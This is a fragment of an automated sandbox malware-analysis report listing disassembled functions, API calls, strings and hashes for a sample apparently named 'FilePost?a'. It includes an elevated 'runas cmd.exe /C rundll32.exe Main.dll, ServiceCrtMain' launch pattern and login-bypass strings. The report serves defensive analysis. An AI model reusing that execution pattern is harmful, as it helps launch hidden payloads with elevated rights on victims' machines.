                                                    • Instruction Fuzzy Hash: E4112672641300AFD7206FA9FC0AF56B7A8EB05B31F00812BF66DA72E0C770A4018B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1150 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(attempt to bypass username/password from %.128s,?), ref: 00ED1176
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • Warning.VMWAREBASE(GET TOKEN KEY failed: got %s,?), ref: 00ED11B0
                                                    Strings
                                                    • Login successful., xrefs: 00ED11D8
                                                    • Login failed: token key not found., xrefs: 00ED11B5
                                                    • GET TOKEN KEY failed: got %s, xrefs: 00ED11AB
                                                    • Login from through tokenkey, xrefs: 00ED11CE
                                                    • attempt to bypass username/password from %.128s, xrefs: 00ED1171
                                                    • Login failed: token key authentication not allowed., xrefs: 00ED117B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: GET TOKEN KEY failed: got %s$Login failed: token key authentication not allowed.$Login failed: token key not found.$Login from through tokenkey$Login successful.$attempt to bypass username/password from %.128s
                                                    • API String ID: 2415109466-2849098001
                                                    • Opcode ID: 8683e543c5e410469a4669f62e0a5714eab16cf79986f56a2f8f9a202387f113
                                                    • Instruction ID: f97416e187e1ed259b703637b1df887214b0011471da2b35d4cf72b1e34d93c0
                                                    • Opcode Fuzzy Hash: 8683e543c5e410469a4669f62e0a5714eab16cf79986f56a2f8f9a202387f113
                                                    • Instruction Fuzzy Hash: AA01F575280344AAD710AB58EC0BF5637E5DB80B08F0520B7F9083B3D3D6A69A238623
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8AF19 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: c73daf3badf4d6d322db0b3c955ea9c852e40f857c17da38fa725047dc4cdedd
                                                    • Instruction ID: b830e7545df3fec2b7c8ef4213d18d10b8cac6350abce8427ecd00179f69694d
                                                    • Opcode Fuzzy Hash: c73daf3badf4d6d322db0b3c955ea9c852e40f857c17da38fa725047dc4cdedd
                                                    • Instruction Fuzzy Hash: 6721B576901118EFCB81DFE5D880DDE7BF8FF08644F0041A6E5159B6A1EB32EA49CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF54590 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 346sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(000007D0), ref: 6CF547C7
                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,?,00000000,00000000), ref: 6CF5492D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShellSleep
                                                    • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                                    • API String ID: 4194306370-3989350086
                                                    • Opcode ID: f7dd1dffc70b612e867f862de81eca9e6a5a1abfedbf62d1c82e6972b2ded789
                                                    • Instruction ID: 824f42deb92531f13672c1cf0fffb32a6b70316086fb9194d4fb7355444b5b91
                                                    • Opcode Fuzzy Hash: f7dd1dffc70b612e867f862de81eca9e6a5a1abfedbf62d1c82e6972b2ded789
                                                    • Instruction Fuzzy Hash: 51D1F570A002489FEB18CF68CC94BEDBBB1FF55304F64425CD115A7B81D774AAA5CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1D40 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED3710: Warning.VMWAREBASE(?,?,00000001,?,00000000,00ED13A6), ref: 00ED377C
                                                      • Part of subcall function 00ED3710: WSAGetLastError.WS2_32(?,00000000,00ED13A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3787
                                                      • Part of subcall function 00ED3710: WaitForSingleObject.KERNEL32(?,?,?,00000000,00ED13A6), ref: 00ED37A8
                                                      • Part of subcall function 00ED3710: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED38FC
                                                      • Part of subcall function 00ED3710: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED3919
                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00EDA5D8,00EDA5D9), ref: 00ED1DF2
                                                    • Warning.VMWAREBASE(Read failed.), ref: 00ED1EE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printf_strnicmp
                                                    • String ID: Please login with USER and PASS.$Read failed.$Received command: %s$Received command: %s ...$Unknown command '%s'$Waiting for next command.
                                                    • API String ID: 3208188869-2408999901
                                                    • Opcode ID: e1dd6636e2590232a04edabec646b7d728ea32665691a45be987ad413bdd26ae
                                                    • Instruction ID: d71dc862777a243c13e5c2863cd44e972c14c1190df68ef921f906493cf7fb0e
                                                    • Opcode Fuzzy Hash: e1dd6636e2590232a04edabec646b7d728ea32665691a45be987ad413bdd26ae
                                                    • Instruction Fuzzy Hash: DC41F670600215ABDB248B14CC41BE673A9EF44309F1850B7ED49FB386DB719E468792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3E70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 83sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED7690: EnterCriticalSection.KERNEL32(?,?,?,?,?,00ED3EB2,?,0000003E,?), ref: 00ED76B2
                                                      • Part of subcall function 00ED7690: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00ED3EB2,?,0000003E,?), ref: 00ED76CA
                                                      • Part of subcall function 00ED7690: LeaveCriticalSection.KERNEL32 ref: 00ED76D3
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00ED3ECA
                                                    • GetLastError.KERNEL32 ref: 00ED3EFE
                                                    • GetLastError.KERNEL32 ref: 00ED3F17
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3F1E
                                                    • Sleep.KERNEL32(00001388), ref: 00ED3F38
                                                    Strings
                                                    • WaitForMultipleObjects failed: %s (%d) , xrefs: 00ED3F24
                                                    • Service is stopped while %d child processes are running. Resources will be leaked., xrefs: 00ED3F51
                                                    • Unexpected wait result: %d, err %d, xrefs: 00ED3F06
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalErrorLastSection$EnterLeaveMultipleObjectsSleepWaitWarningmemcpy
                                                    • String ID: Service is stopped while %d child processes are running. Resources will be leaked.$Unexpected wait result: %d, err %d$WaitForMultipleObjects failed: %s (%d)
                                                    • API String ID: 3501445041-2352199725
                                                    • Opcode ID: 54db05b668fed1f01beb3e083c851e5889311e2dda9e6b0ceecbd551e3642757
                                                    • Instruction ID: 79fe71bbd78e50ea50acc6dc530b63c17cc5b234451bf4bf37f720cc61fa0bdf
                                                    • Opcode Fuzzy Hash: 54db05b668fed1f01beb3e083c851e5889311e2dda9e6b0ceecbd551e3642757
                                                    • Instruction Fuzzy Hash: AD213775D00219AFD720AB64AC46AEA73A8DB24700F0411A7BA45F23C1E6708F8686A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED8250 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00000001,?,00000000,?,00ED81F3,00000000,00000000), ref: 00ED825E
                                                    • Warning.VMWAREBASE(00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED8284
                                                    • Warning.VMWAREBASE(%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED8296
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED829C
                                                    • Warning.VMWAREBASE(00ED81F3), ref: 00ED82A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: %s: Creating ticket directory: %s$TicketGetTicketDir$tickets
                                                    • API String ID: 2642810717-1121398582
                                                    • Opcode ID: 2073a414db2e9b5b52c4f9a118aeec1e11de06a3da79ba4086408fc5d6f7e651
                                                    • Instruction ID: 392c84cd71beb8966c6a92eedeb92a037211f9bb9fd7f673ee7edb198334f231
                                                    • Opcode Fuzzy Hash: 2073a414db2e9b5b52c4f9a118aeec1e11de06a3da79ba4086408fc5d6f7e651
                                                    • Instruction Fuzzy Hash: 56F0F63268531036DA112A98AD02FED739DCB41B64F047427F9487A3E7CAA2544313A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF81874 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF81951
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF8195C
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A50
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A6D
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A8A
                                                    • DName::operator+.LIBCMT ref: 6CF81A9F
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81AB9
                                                    • DName::operator+.LIBCMT ref: 6CF81B8E
                                                      • Part of subcall function 6CF7D97C: DName::DName.LIBVCRUNTIME ref: 6CF7D9DA
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF81C05
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 3679549980-0
                                                    • Opcode ID: 8971bcc62dfdd881ee0fc54acb01e157dddcb34cf6ea9fbf1e13087b073fbfdf
                                                    • Instruction ID: 2427b2221c429b16ce773f830bbc308300c1c6a530905ec498d112d09cfd2f7e
                                                    • Opcode Fuzzy Hash: 8971bcc62dfdd881ee0fc54acb01e157dddcb34cf6ea9fbf1e13087b073fbfdf
                                                    • Instruction Fuzzy Hash: 6EA1D772D4620A9ADF04DFB4E995AEFB778AF06308F10871AD135B6E90DB34D648C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED5960 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000008), ref: 00ED5968
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003E00,00000000,00000000,00000000), ref: 00ED59A5
                                                    • GetLastError.KERNEL32 ref: 00ED59AF
                                                    • closesocket.WS2_32(00000000), ref: 00ED59C7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED59CE
                                                    Strings
                                                    • Could not create thread to handle socket connection. (error %d)., xrefs: 00ED59B6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThreadcallocclosesocketfree
                                                    • String ID: Could not create thread to handle socket connection. (error %d).
                                                    • API String ID: 516406090-3747702049
                                                    • Opcode ID: d1f4ae3cdac35842c0e3397d3845b5fdabaa0d5b8384ac3d13f867fd0ae2a14e
                                                    • Instruction ID: 43596ac1c9e71a2f909a79392c6de5da99e59defcc6ccf26d9c48e157e2be86e
                                                    • Opcode Fuzzy Hash: d1f4ae3cdac35842c0e3397d3845b5fdabaa0d5b8384ac3d13f867fd0ae2a14e
                                                    • Instruction Fuzzy Hash: F401DB71182310BFD7201F65BC0ABDA7FA8DB04765F149027FA4DBE281C2759605C7D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED8AB0 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00ED8AB3
                                                    • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00ED8ABE
                                                    • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00ED8ACA
                                                    • __RTC_Initialize.LIBCMT ref: 00ED8AE2
                                                    • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00ED9280), ref: 00ED8AF7
                                                      • Part of subcall function 00ED91EC: InitializeSListHead.KERNEL32(00EE14A0,00ED8B07), ref: 00ED91F1
                                                    • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002320), ref: 00ED8B15
                                                    • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00ED8B30
                                                    • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED8B3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                    • String ID:
                                                    • API String ID: 1933938900-0
                                                    • Opcode ID: ba154ba538b464a3bf389577764a38c8b9ee812ce6d7f195feee47ce39da8d4a
                                                    • Instruction ID: c4fcb9166a03d648b46a3496e3952d375ea47d57f840d43e143c184ab8bbcdd2
                                                    • Opcode Fuzzy Hash: ba154ba538b464a3bf389577764a38c8b9ee812ce6d7f195feee47ce39da8d4a
                                                    • Instruction Fuzzy Hash: D30137A5A4130774E92037F52E07B9E22D8CF62B58F45784BFA44BA3D7DD2984474072
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7B80E Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6CF7BA3B
                                                    • _UnwindNestedFrames.LIBCMT ref: 6CF7BB8D
                                                    • CallUnexpected.LIBVCRUNTIME ref: 6CF7BBA8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3456342781-393685449
                                                    • Opcode ID: 8fcebf1cb6a1217f47d1583e3c15dd4b9ff27ff517ff1ee4ea02617158c7a0fc
                                                    • Instruction ID: 142a17d67860db753ecb4e6f9a6d441a02d2cabb8578ebf0aebf2c7bc16200e5
                                                    • Opcode Fuzzy Hash: 8fcebf1cb6a1217f47d1583e3c15dd4b9ff27ff517ff1ee4ea02617158c7a0fc
                                                    • Instruction Fuzzy Hash: 7AB17C71800209EFCF28DFA4E88099EB7B5FF06318F15495BE8106BA15D731DA65CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF51AF0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF51B73
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CF51BBF
                                                    • __Getctype.LIBCPMT ref: 6CF51BD8
                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CF51BF4
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF51C89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                    • String ID: bad locale name
                                                    • API String ID: 1840309910-1405518554
                                                    • Opcode ID: 8d5db19f173dd923f8091c68074004ee2e543217be01aced27c588201a317c0c
                                                    • Instruction ID: d7e73004f5911aad0bc93aef6d5118519484a296cf9ee2cc7ab03389b1764e03
                                                    • Opcode Fuzzy Hash: 8d5db19f173dd923f8091c68074004ee2e543217be01aced27c588201a317c0c
                                                    • Instruction Fuzzy Hash: 015163B1D012489BEF10CFE4D9447DEBBB8AF14308F14816AE914AB740E776E659CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7DD55 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF7DDE3
                                                    • DName::operator+.LIBCMT ref: 6CF7DE36
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                      • Part of subcall function 6CF7C97B: DName::operator+.LIBCMT ref: 6CF7C99C
                                                    • DName::operator+.LIBCMT ref: 6CF7DE27
                                                    • DName::operator+.LIBCMT ref: 6CF7DE87
                                                    • DName::operator+.LIBCMT ref: 6CF7DE94
                                                    • DName::operator+.LIBCMT ref: 6CF7DEDB
                                                    • DName::operator+.LIBCMT ref: 6CF7DEE8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$shared_ptr
                                                    • String ID:
                                                    • API String ID: 1037112749-0
                                                    • Opcode ID: 4f1c04b962eb600550cb76078d4403ee09fb1456a29ca10bfed428477d92fd75
                                                    • Instruction ID: 7b44aeca4693a9ef4b602dd1395d81437ce6f625aee2a1d200096ccff3bda37d
                                                    • Opcode Fuzzy Hash: 4f1c04b962eb600550cb76078d4403ee09fb1456a29ca10bfed428477d92fd75
                                                    • Instruction Fuzzy Hash: 075183B2901218AFDF25DF94E851FEFBBB8AF58304F50415BE505A7680EB709648CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF74DD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    APIs
